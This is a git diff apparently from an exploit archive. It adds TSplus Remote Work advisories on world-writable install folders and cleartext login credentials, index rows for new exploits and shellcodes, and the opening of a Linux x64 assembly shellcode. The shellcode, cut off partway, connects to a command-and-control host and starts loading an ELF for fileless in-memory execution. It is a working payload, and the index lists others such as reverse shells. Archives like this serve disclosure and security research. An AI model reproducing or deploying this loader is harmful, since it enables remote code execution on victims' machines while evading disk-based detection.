+C:\Program Files (x86)\TSplus\Clients\www\software\java\img\index.html
+C:\Program Files (x86)\TSplus\Clients\www\software\java\img\port.bin
+C:\Program Files (x86)\TSplus\Clients\www\software\java\third\jws.js
+C:\Program Files (x86)\TSplus\Clients\www\software\java\third\sha256.js
+C:\Program Files
+(x86)\TSplus\Clients\www\software\java\third\js\prototype\prototype.js
+C:\Program Files (x86)\TSplus\Clients\www\software\js\jquery.min.js
\ No newline at end of file
diff --git a/exploits/windows/remote/51680.txt b/exploits/windows/remote/51680.txt
new file mode 100644
index 0000000000..b83e9a1fd5
--- /dev/null
+++ b/exploits/windows/remote/51680.txt
@@ -0,0 +1,103 @@
+# Exploit Title: TSplus 16.0.0.0 - Remote Work Insecure Files and Folders Permissions
+# Date: 2023-08-09
+# Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia
+# Vendor Homepage: https://tsplus.net/
+# Version: Up to 16.0.0.0
+# Tested on: Windows
+# CVE : CVE-2023-31068
+
+With TSPlus Remote Work (v. 16.0.0.0) you can create a secure single
+sign-on web portal and remote desktop gateway that enables users to
+remotely access the console session of their office PC.
+The solution comes with an embedded web server to allow remote users to
+easely connect remotely.
+However, insecure file and folder permissions are set, and this could
+allow a malicious user to manipulate file content (e.g.: changing the
+code of html pages or js scripts) or change legitimate files (e.g.
+Setup-RemoteWork-Client.exe) in order to compromise a system or to gain
+elevated privileges.
+
+This is the list of insecure files and folders with their respective
+permissions:
+
+Permission: Everyone:(OI)(CI)(F)
+
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-bin
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\download
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\downloads
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\prints
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\var
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-bin\remoteapp
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\downloads\shared
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\js
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\html5\jwres
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\html5\locales
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\own
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\des
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\key
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\topmenu
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\key\parts
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\img
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\java\img\cp
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\java\img\srv
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\java\third\images
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\java\third\js
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\java\third\images\bramus
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\java\third\js\prototype
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\var\log
+
+-------------------------------------------------------------------------------------------
+
+Permission: Everyone:(F)
+
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\robots.txt
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\cgi-bin\hb.exe.config
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\cgi-bin\SessionPrelaunch.Common.dll.config
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\cgi-bin\remoteapp\index.html
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\download\common.js
+C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\download\lang.js
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\download\Setup-RemoteWork-Client.exe
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\html5\jwres\jwwebsockify.jar
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\html5\jwres\web.jar
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\html5\own\exitlist.html
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\html5\own\exitupload.html
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\java\index.html
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\java\img\index.html
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\java\img\port.bin
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\java\third\jws.js
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\java\third\sha256.js
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\java\third\js\prototype\prototype.js
+C:\Program Files
+(x86)\TSplus-RemoteWork\Clients\www\software\js\jquery.min.js
\ No newline at end of file
diff --git a/exploits/windows/remote/51681.txt b/exploits/windows/remote/51681.txt
new file mode 100644
index 0000000000..10f312095a
--- /dev/null
+++ b/exploits/windows/remote/51681.txt
@@ -0,0 +1,45 @@
+# Exploit Title: TSPlus 16.0.0.0 - Remote Work Insecure Credential storage
+# Date: 2023-08-09
+# Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia
+# Vendor Homepage: https://tsplus.net/
+# Version: Up to 16.0.0.0
+# Tested on: Windows
+# CVE : CVE-2023-31069
+
+With TSPlus Remote Work (v. 16.0.0.0) you can create a secure single
+sign-on web portal and remote desktop gateway that enables users to
+remotely access the console session of their office PC.
+It is possible to create a custom web portal login page which allows a
+user to login without providing their credentials.
+However, the credentials are stored in an insecure manner since they are
+saved in cleartext, within the html login page.
+This means that everyone with an access to the web login page, can
+easely retrieve the credentials to access to the application by simply
+looking at the html code page.
+
+This is a code snippet extracted by the source code of the login page
+(var user and var pass):
+
+   // --------------- Access Configuration ---------------
+   var user = "Admin";                         // Login to use when
+connecting to the remote server (leave "" to use the login typed in this
+page)
+   var pass = "SuperSecretPassword";           // Password to use when
+connecting to the remote server (leave "" to use the password typed in
+this page)
+   var domain = "";                            // Domain to use when
+connecting to the remote server (leave "" to use the domain typed in
+this page)
+   var server = "127.0.0.1";                   // Server to connect to
+(leave "" to use localhost and/or the server chosen in this page)
+   var port = "";                              // Port to connect to
+(leave "" to use localhost and/or the port of the server chosen in this
+page)
+   var lang = "as_browser";                    // Language to use
+   var serverhtml5 = "127.0.0.1";              // Server to connect to,
+when using HTML5 client
+   var porthtml5 = "3389";                     // Port to connect to,
+when using HTML5 client
+   var cmdline = "";                           // Optional text that will
+be put in the server's clipboard once connected
+   // --------------- End of Access Configuration ---------------
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index dc91085d87..ddeed0ad1e 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -3565,6 +3565,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 36831,exploits/hardware/remote/36831.txt,"Endian Firewall 2.4 - 'openvpn_users.cgi?PATH_INFO' Cross-Site Scripting",2012-02-27,"Vulnerability Research Laboratory",remote,hardware,,2012-02-27,2015-04-27,1,CVE-2012-4923;OSVDB-85700,,,,,https://www.securityfocus.com/bid/52076/info
 51441,exploits/hardware/remote/51441.txt,"Epson Stylus SX510W Printer Remote Power Off - Denial of Service",2023-05-13,"Rafael Pedrero",remote,hardware,,2023-05-13,2023-05-13,0,,,,,,
 22244,exploits/hardware/remote/22244.txt,"Ericsson HM220dp DSL Modem - World Accessible Web Administration Interface",2003-02-11,"Davide Del Vecchio",remote,hardware,,2003-02-11,2012-10-25,1,CVE-2003-1442;OSVDB-59601,,,,,https://www.securityfocus.com/bid/6824/info
+51685,exploits/hardware/remote/51685.txt,"EuroTel ETL3100 - Transmitter Authorization Bypass (IDOR)",2023-08-21,LiquidWorm,remote,hardware,,2023-08-21,2023-08-21,0,,,,,,
+51684,exploits/hardware/remote/51684.txt,"EuroTel ETL3100 - Transmitter Default Credentials",2023-08-21,LiquidWorm,remote,hardware,,2023-08-21,2023-08-21,0,,,,,,
+51686,exploits/hardware/remote/51686.txt,"EuroTel ETL3100 - Transmitter Unauthenticated Config/Log Download",2023-08-21,LiquidWorm,remote,hardware,,2023-08-21,2023-08-21,0,,,,,,
 40474,exploits/hardware/remote/40474.txt,"Exagate WEBPack Management System - Multiple Vulnerabilities",2016-10-06,"Halil Dalabasmaz",remote,hardware,,2016-10-06,2016-10-06,0,,,,,,
 19091,exploits/hardware/remote/19091.py,"F5 BIG-IP - Authentication Bypass",2012-06-12,"David Kennedy (ReL1K)",remote,hardware,,2012-06-12,2016-12-09,1,CVE-2012-1493;OSVDB-82780,,,,,
 34465,exploits/hardware/remote/34465.txt,"F5 Big-IP - rsync Access",2014-08-29,Security-Assessment.com,remote,hardware,22,2014-08-29,2014-08-29,0,CVE-2014-2927,,,,,
@@ -16021,6 +16024,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 47388,exploits/php/webapps/47388.txt,"College-Management-System 1.2 - Authentication Bypass",2019-09-14,cakes,webapps,php,,2019-09-14,2019-09-14,1,,,,,http://www.exploit-db.comCollege-Management-System-master.zip,
 48593,exploits/php/webapps/48593.txt,"College-Management-System-Php 1.0 - Authentication Bypass",2020-06-17,"BLAY ABU SAFIAN",webapps,php,,2020-06-17,2020-06-17,0,,,,,,
 47395,exploits/php/webapps/47395.txt,"CollegeManagementSystem-CMS 1.3 - 'batch' SQL Injection",2019-09-16,cakes,webapps,php,,2019-09-16,2019-09-16,1,,,,,http://www.exploit-db.comCollegeManagementSystem-CMS-1-3.zip,
+51689,exploits/php/webapps/51689.txt,"Color Prediction Game v1.0 - SQL Injection",2023-08-21,"Ahmet Ümit BAYRAM",webapps,php,,2023-08-21,2023-08-21,0,,,,,,
 40527,exploits/php/webapps/40527.txt,"Colorful Blog - Cross-Site Request Forgery (Change Admin Password)",2016-10-13,Besim,webapps,php,,2016-10-13,2016-10-13,0,,,,,,
 40526,exploits/php/webapps/40526.txt,"Colorful Blog - Persistent Cross-Site Scripting",2016-10-13,Besim,webapps,php,,2016-10-13,2016-10-14,0,,,,,,
 46209,exploits/php/webapps/46209.txt,"Coman 1.0 - 'id' SQL Injection",2019-01-21,"Ihsan Sencan",webapps,php,80,2019-01-21,2019-01-21,1,,"SQL Injection (SQLi)",,,,
@@ -16394,6 +16398,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 6586,exploits/php/webapps/6586.txt,"Crux Gallery 1.32 - Insecure Cookie Handling",2008-09-26,Pepelux,webapps,php,,2008-09-25,,1,OSVDB-49048;CVE-2008-4484;OSVDB-48660,,,,,
 31097,exploits/php/webapps/31097.txt,"CruxCMS 3.0 - 'search.php' Cross-Site Scripting",2008-02-04,Psiczn,webapps,php,,2008-02-04,2014-01-21,1,CVE-2008-0700;OSVDB-41520,,,,,https://www.securityfocus.com/bid/27588/info
 35155,exploits/php/webapps/35155.txt,"CruxCMS 3.0 - Multiple Input Validation Vulnerabilities",2010-12-26,ToXiC,webapps,php,,2010-12-26,2014-11-04,1,,,,,,https://www.securityfocus.com/bid/45594/info
+51688,exploits/php/webapps/51688.txt,"Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated)",2023-08-21,0xBr,webapps,php,,2023-08-21,2023-08-21,0,CVE-2023-37759,,,,,
 32952,exploits/php/webapps/32952.txt,"CS Whois Lookup - 'ip' Remote Command Execution",2009-04-23,SirGod,webapps,php,,2009-04-23,2014-04-21,1,,,,,,https://www.securityfocus.com/bid/34700/info
 27030,exploits/php/webapps/27030.txt,"CS-Cart - Multiple SQL Injections",2005-12-25,r0t3d3Vil,webapps,php,,2005-12-25,2013-07-23,1,CVE-2005-4429;OSVDB-21370,,,,,https://www.securityfocus.com/bid/16134/info
 31443,exploits/php/webapps/31443.txt,"CS-Cart 1.3.2 - 'index.php' Cross-Site Scripting",2008-03-19,sasquatch,webapps,php,,2008-03-19,2014-02-06,1,CVE-2008-1458;OSVDB-43353,,,,,https://www.securityfocus.com/bid/28333/info
@@ -17038,6 +17043,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 45945,exploits/php/webapps/45945.txt,"Dolibarr ERP/CRM 8.0.3 - Cross-Site Scripting",2018-12-04,AkkuS,webapps,php,80,2018-12-04,2018-12-04,0,CVE-2018-19799,"Cross-Site Scripting (XSS)",,,,
 18725,exploits/php/webapps/18725.txt,"Dolibarr ERP/CRM < 3.2.0 / < 3.1.1 - OS Command Injection",2012-04-09,"Nahuel Grisolia",webapps,php,,2012-04-09,2018-07-13,1,OSVDB-80980,,,,,
 44964,exploits/php/webapps/44964.txt,"Dolibarr ERP/CRM < 7.0.3 - PHP Code Injection",2018-07-02,om3rcitak,webapps,php,80,2018-07-02,2018-07-13,0,,"Code Injection",,,http://www.exploit-db.comdolibarr-7.0.0.tar.gz,
+51683,exploits/php/webapps/51683.txt,"Dolibarr Version 17.0.1 - Stored XSS",2023-08-21,"Furkan Karaarslan",webapps,php,,2023-08-21,2023-08-21,0,,,,,,
 15400,exploits/php/webapps/15400.txt,"Dolphin 7.0.3 - Multiple Vulnerabilities",2010-11-02,anT!-Tr0J4n,webapps,php,,2010-11-02,2010-11-02,0,OSVDB-68981,,,,http://www.exploit-db.comDolphin-v.7.0.3.zip,
 35332,exploits/php/webapps/35332.txt,"Dolphin 7.0.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-10,"AutoSec Tools",webapps,php,,2011-02-10,2014-11-23,1,,,,,,https://www.securityfocus.com/bid/46337/info
 17994,exploits/php/webapps/17994.php,"Dolphin 7.0.7 - 'member_menu_queries.php' Remote PHP Code Injection",2011-10-18,EgiX,webapps,php,,2011-10-18,2011-10-18,0,OSVDB-76662,,,,http://www.exploit-db.comDolphin-v.7.0.7.zip,
@@ -19113,6 +19119,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 41665,exploits/php/webapps/41665.txt,"GLink Word Link Script 1.2.3 - SQL Injection",2017-03-22,"Ihsan Sencan",webapps,php,,2017-03-22,2017-03-22,0,,,,,http://www.exploit-db.comscript_131.zip,
 5806,exploits/php/webapps/5806.pl,"GLLCTS2 - 'sort' Blind SQL Injection",2008-06-13,anonymous,webapps,php,,2008-06-12,2016-12-06,1,OSVDB-46171;CVE-2008-2919,,,,,
 5796,exploits/php/webapps/5796.php,"GLLCTS2 < 4.2.4 - 'detail' SQL Injection",2008-06-12,TheDefaced,webapps,php,,2008-06-11,2016-12-06,1,OSVDB-46172;CVE-2008-2746,,,,,
+51690,exploits/php/webapps/51690.txt,"Global - Multi School Management System Express v1.0- SQL Injection",2023-08-21,"Ahmet Ümit BAYRAM",webapps,php,,2023-08-21,2023-08-21,0,,,,,,
 30438,exploits/php/webapps/30438.txt,"Global Centre Aplomb Poll 1.1 - 'admin.php?Madoa' Remote File Inclusion",2007-07-30,"ilker Kandemir",webapps,php,,2007-07-30,2013-12-23,1,CVE-2007-4101;OSVDB-37264,,,,,https://www.securityfocus.com/bid/25138/info
 30436,exploits/php/webapps/30436.txt,"Global Centre Aplomb Poll 1.1 - 'index.php?Madoa' Remote File Inclusion",2007-07-30,"ilker Kandemir",webapps,php,,2007-07-30,2013-12-23,1,CVE-2007-4101;OSVDB-37262,,,,,https://www.securityfocus.com/bid/25138/info
 30437,exploits/php/webapps/30437.txt,"Global Centre Aplomb Poll 1.1 - 'vote.php?Madoa' Remote File Inclusion",2007-07-30,"ilker Kandemir",webapps,php,,2007-07-30,2013-12-23,1,CVE-2007-4101;OSVDB-37263,,,,,https://www.securityfocus.com/bid/25138/info
@@ -25372,6 +25379,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 39068,exploits/php/webapps/39068.txt,"Ovidentia online Module 2.8 - 'GLOBALS[babAddonPhpPath]' Remote File Inclusion",2015-12-21,bd0rk,webapps,php,,2015-12-21,2015-12-21,0,OSVDB-132299,,,,http://www.exploit-db.comonline-2-8.zip,
 39688,exploits/php/webapps/39688.txt,"Ovidentia troubleticketsModule 7.6 - Remote File Inclusion",2016-04-12,bd0rk,webapps,php,80,2016-04-12,2016-04-12,0,,,,,http://www.exploit-db.comtroubletickets-7-6.zip,
 39069,exploits/php/webapps/39069.pl,"Ovidentia Widgets 1.0.61 - Remote Command Execution",2015-12-21,bd0rk,webapps,php,80,2015-12-21,2015-12-21,0,OSVDB-132298,,,,http://www.exploit-db.comwidgets-1-0-61.zip,
+51691,exploits/php/webapps/51691.txt,"OVOO Movie Portal CMS v3.3.3 - SQL Injection",2023-08-21,"Ahmet Ümit BAYRAM",webapps,php,,2023-08-21,2023-08-21,0,,,,,,
 7597,exploits/php/webapps/7597.txt,"OwenPoll 1.0 - Insecure Cookie Handling",2008-12-28,Osirys,webapps,php,,2008-12-27,,1,OSVDB-51991;CVE-2008-6143,,,,,
 22600,exploits/php/webapps/22600.txt,"Owl Intranet Engine 0.7 - Authentication Bypass",2003-05-14,cdowns,webapps,php,,2003-05-14,2012-11-10,1,,,,,,https://www.securityfocus.com/bid/7595/info
 1561,exploits/php/webapps/1561.pl,"OWL Intranet Engine 0.82 - 'xrms_file_root' Code Execution",2006-03-07,rgod,webapps,php,,2006-03-06,2016-06-29,1,OSVDB-23734;CVE-2006-1149,,,,http://www.exploit-db.comOwl-0.82.tar.gz,
@@ -26999,6 +27007,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 32251,exploits/php/webapps/32251.txt,"PHPizabi 0.848b C1 HP3 - 'id' Local File Inclusion",2008-08-15,Lostmon,webapps,php,,2008-08-15,2014-03-14,1,CVE-2008-3723;OSVDB-47560,,,,,https://www.securityfocus.com/bid/30707/info
 30911,exploits/php/webapps/30911.txt,"PHPJabbers Appointment Scheduler 2.0 - Multiple Vulnerabilities",2014-01-14,HackXBack,webapps,php,80,2014-01-14,2014-01-14,0,OSVDB-102246;OSVDB-102163;OSVDB-102147;CVE-2014-10010;CVE-2014-10001,,,,,
 49281,exploits/php/webapps/49281.txt,"PHPJabbers Appointment Scheduler 2.3 - Reflected XSS (Cross-Site Scripting)",2020-12-17,"Andrea Intilangelo",webapps,php,,2020-12-17,2021-02-15,0,CVE-2020-35416,,,,,
+51687,exploits/php/webapps/51687.txt,"PHPJabbers Business Directory Script v3.2 - Multiple Vulnerabilities",2023-08-21,"Kerimcan Ozturk",webapps,php,,2023-08-21,2023-08-21,0,,,,,,
 30912,exploits/php/webapps/30912.txt,"PHPJabbers Car Rental Script - Multiple Vulnerabilities",2014-01-14,HackXBack,webapps,php,80,2014-01-14,2014-01-14,0,OSVDB-102162;OSVDB-102146,,,,,
 51651,exploits/php/webapps/51651.txt,"PHPJabbers Cleaning Business 1.0 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-4115,,,,,
 30913,exploits/php/webapps/30913.txt,"PHPJabbers Event Booking Calendar 2.0 - Multiple Vulnerabilities",2014-01-14,HackXBack,webapps,php,80,2014-01-14,2014-01-14,0,OSVDB-102161;OSVDB-102160;OSVDB-102145;CVE-2014-10015;CVE-2014-10014,,,,,
@@ -30460,6 +30469,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 35337,exploits/php/webapps/35337.txt,"TaskFreak! 0.6.4 - 'print_list.php' Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,webapps,php,,2011-02-12,2016-10-27,1,CVE-2011-1062;OSVDB-70878,,,,http://www.exploit-db.comtaskfreak-multi-mysql-0.6.4.tgz,https://www.securityfocus.com/bid/46350/info
 35338,exploits/php/webapps/35338.txt,"TaskFreak! 0.6.4 - 'rss.php' HTTP Referer Header Cross-Site Scripting",2011-02-12,LiquidWorm,webapps,php,,2011-02-12,2016-10-27,1,CVE-2011-1062;OSVDB-70932,,,,http://www.exploit-db.comtaskfreak-multi-mysql-0.6.4.tgz,https://www.securityfocus.com/bid/46350/info
 16158,exploits/php/webapps/16158.txt,"TaskFreak! 0.6.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,webapps,php,,2011-02-12,2011-02-12,0,CVE-2011-1062;OSVDB-70932;OSVDB-70878;OSVDB-70877,,,,http://www.exploit-db.comtaskfreak-multi-mysql-0.6.4.tgz,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4990
+51692,exploits/php/webapps/51692.txt,"Taskhub CRM Tool 2.8.6 - SQL Injection",2023-08-21,"Ahmet Ümit BAYRAM",webapps,php,,2023-08-21,2023-08-21,0,,,,,,
 15269,exploits/php/webapps/15269.txt,"Tastydir 1.2 (1216) - Multiple Vulnerabilities",2010-10-17,R,webapps,php,,2010-10-17,2015-04-17,0,,,,,,
 34809,exploits/php/webapps/34809.txt,"Tausch Ticket Script 3 - 'suchauftraege_user.php?userid' SQL Injection",2009-07-07,Moudi,webapps,php,,2009-07-07,2014-09-29,1,CVE-2009-2428;OSVDB-55691,,,,,https://www.securityfocus.com/bid/43710/info
 34810,exploits/php/webapps/34810.txt,"Tausch Ticket Script 3 - 'vote.php?descr' SQL Injection",2009-07-07,Moudi,webapps,php,,2009-07-07,2014-09-29,1,CVE-2009-2428;OSVDB-55692,,,,,https://www.securityfocus.com/bid/43710/info
@@ -40217,6 +40227,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 38904,exploits/windows/local/38904.txt,"iniNet SpiderControl PLC Editor Simatic 6.30.04 - Insecure File Permissions",2015-12-08,LiquidWorm,local,windows,,2015-12-08,2015-12-08,0,OSVDB-131580,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5283.php
 38903,exploits/windows/local/38903.txt,"iniNet SpiderControl SCADA Web Server Service 2.02 - Insecure File Permissions",2015-12-08,LiquidWorm,local,windows,,2015-12-08,2015-12-08,0,OSVDB-131579,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5284.php
 23996,exploits/windows/local/23996.py,"Inmatrix Ltd. Zoom Player 8.5 - '.jpeg'File Memory Corruption / Arbitrary Code Execution",2013-01-09,"Debasish Mandal",local,windows,,2013-01-09,2017-11-22,1,OSVDB-89099,,,,,
+51682,exploits/windows/local/51682.txt,"Inosoft VisiWin 7 2022-2.1 - Insecure Folders Permissions",2023-08-21,shinnai,local,windows,,2023-08-21,2023-08-21,0,CVE-2023-31468,,,,,
 48795,exploits/windows/local/48795.txt,"Input Director 1.4.3 - 'Input Director' Unquoted Service Path",2020-09-09,"TOUHAMI Kasbaoui",local,windows,,2020-09-09,2020-09-09,0,,,,,,
 40522,exploits/windows/local/40522.txt,"InsOnSrv Asus InstantOn 2.3.1.1 - Unquoted Service Path Privilege Escalation",2016-10-13,"Cyril Vallicari",local,windows,,2016-10-13,2016-10-13,0,,,,,,
 40072,exploits/windows/local/40072.txt,"InstantHMI 6.1 - Local Privilege Escalation",2016-07-08,sh4d0wman,local,windows,,2016-07-08,2016-07-08,0,,,,,,
@@ -45193,6 +45204,9 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 21675,exploits/windows/remote/21675.pl,"Trillian 0.x IRC Module - Remote Buffer Overflow",2002-07-31,"John C. Hennessy",remote,windows,,2002-07-31,2012-10-02,1,OSVDB-10789,,,,,https://www.securityfocus.com/bid/5373/info
 30315,exploits/windows/remote/30315.txt,"Trillian 3.1.6.0 - URI Handler Remote Code Execution",2007-07-16,"Nate Mcfeters",remote,windows,,2007-07-16,2013-12-16,1,CVE-2007-3832;OSVDB-38171,,,,,https://www.securityfocus.com/bid/24927/info
 19561,exploits/windows/remote/19561.c,"True North Software Internet Anywhere Mail Server 2.3.x - Mail Server Multiple Buffer Overflow",1999-10-01,"Arne Vidstrom",remote,windows,,1999-10-01,2017-11-15,1,CVE-2000-0016;OSVDB-13591,,iamexploit.c,,,https://www.securityfocus.com/bid/730/info
+51681,exploits/windows/remote/51681.txt,"TSPlus 16.0.0.0 - Remote Work Insecure Credential storage",2023-08-21,shinnai,remote,windows,,2023-08-21,2023-08-21,0,CVE-2023-31069,,,,,
+51680,exploits/windows/remote/51680.txt,"TSplus 16.0.0.0 - Remote Work Insecure Files and Folders",2023-08-21,shinnai,remote,windows,,2023-08-21,2023-08-21,0,CVE-2023-31068,,,,,
+51679,exploits/windows/remote/51679.txt,"TSplus 16.0.2.14 - Remote Access Insecure Files and Folders Permissions",2023-08-21,shinnai,remote,windows,,2023-08-21,2023-08-21,0,CVE-2023-31067,,,,,
 5398,exploits/windows/remote/5398.html,"Tumbleweed SecureTransport 4.6.1 FileTransfer - ActiveX Buffer Overflow",2008-04-07,"Patrick Webster",remote,windows,,2008-04-06,2016-11-21,1,OSVDB-44252;CVE-2008-1724,,,,,
 16563,exploits/windows/remote/16563.rb,"Tumbleweed SecureTransport FileTransfer - 'vcst_eu.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-06-15,Metasploit,remote,windows,,2010-06-15,2016-10-27,1,CVE-2008-1724;OSVDB-44252,"Metasploit Framework (MSF)",,,,
 22161,exploits/windows/remote/22161.rb,"Turbo FTP Server 1.30.823 - PORT Overflow (Metasploit)",2012-10-23,Metasploit,remote,windows,21,2012-10-23,2012-10-23,1,OSVDB-85887,"Metasploit Framework (MSF)",,,,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index d3a5a6a0f7..8882077c19 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -192,6 +192,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
 47239,shellcodes/linux/47239.c,"Linux/Tru64 alpha - execve(/bin/sh) Shellcode (108 bytes)",2019-03-25,"Hacker House",,linux,108,2019-08-13,2019-08-13,0,,,,,,https://github.com/hackerhouse-opensource/shellcode/blob/12c468d26e3fb395462dd030c6b9700aed6a3826/alpha/execve.c
 49756,shellcodes/linux/49756.asm,"Linux/x64 - /sbin/halt -p Shellcode (51 bytes)",2021-04-09,"Chenthur Velan",,linux,,2021-04-09,2021-10-28,0,,,,,,
 49472,shellcodes/linux/49472.c,"Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes)",2021-01-25,"Guillem Alminyana",,linux,,2021-01-25,2021-10-29,0,,,,,,
+51693,shellcodes/linux/51693.asm,"Linux/x64 - memfd_create ELF loader Shellcode (170 bytes)",2023-08-21,"Ivan Nikolsky",,linux,170,2023-08-21,2023-08-21,0,,,,,,
 40128,shellcodes/linux_crisv32/40128.c,"Linux/CRISv32 Axis Communication - Reverse (192.168.57.1:443/TCP) Shell (/bin/sh) Shellcode (189 bytes)",2016-07-20,bashis,,linux_crisv32,189,2016-07-20,2018-01-12,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-903.php
 45541,shellcodes/linux_mips/45541.c,"Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse (192.168.2.157:31337/TCP) Shellcode (181 bytes)",2018-10-08,cq674350529,,linux_mips,181,2018-10-08,2018-10-08,0,,,,,,
 13298,shellcodes/linux_mips/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - Bind (4919/TCP) Shell (/bin/sh) Shellcode (276 bytes)",2008-08-18,vaicebine,,linux_mips,276,2008-08-17,2018-01-12,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-81.php
diff --git a/shellcodes/linux/51693.asm b/shellcodes/linux/51693.asm
new file mode 100644
index 0000000000..cbe616af3f
--- /dev/null
+++ b/shellcodes/linux/51693.asm
@@ -0,0 +1,148 @@
+# Shellcode Title: Linux/x64 - memfd_create ELF loader (170 bytes)
+# Shellcode Author: Ivan Nikolsky (enty8080) & Tomas Globis (tomasglgg)
+# Tested on: Linux (x86_64)
+# Shellcode Description: This shellcode attempts to establish reverse TCP connection, reads ELF length, reads ELF and maps it into the memory, creates memory file descriptor, writes loaded ELF to it and executes. This shellcode can be used for fileless ELF execution, because no data is writted to disk
+# Blog post: https://blog.entysec.com/2023-04-02-remote-elf-loading/
+# Original code: https://github.com/EntySec/Pawn
+
+section .text
+global _start
+
+_start:
+    ; Set up socket for further communication with C2
+    ;
+    ; socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
+
+    push 0x29
+    pop  rax
+    cdq
+    push 0x2
+    pop  rdi
+    push 0x1
+    pop  rsi
+    syscall
+
+    ; Connect to the C2 server
+    ;
+    ; int connect(int sockfd, {
+    ;                 sa_family=AF_INET,
+    ;                 sin_port=htons(8888),
+    ;                 sin_addr=inet_addr("127.0.0.1")
+    ;             }, 16);
+
+    xchg rdi, rax
+    mov  rcx, 0x0100007fb8220002
+    push rcx
+    mov  rsi, rsp
+    push 0x10
+    pop  rdx
+    push 0x2a
+    pop  rax
+    syscall
+
+    ; Read ELF length from socket
+    ;
+    ; read(unsigned int fd, char *buf, 8);
+
+    pop  rcx
+    push 0x8
+    pop  rdx
+    push 0x0
+    lea  rsi, [rsp]
+    xor  rax, rax
+    syscall
+
+    ; Save length to r12 and socket descriptor to r13
+
+    pop  r12
+    push rdi
+    pop  r13
+
+    ; Create file descriptor for ELF file
+    ;
+    ; int memfd_create("", 0);
+
+    xor  rax, rax
+    push rax
+    push rsp
+    sub  rsp, 8
+    mov  rdi, rsp
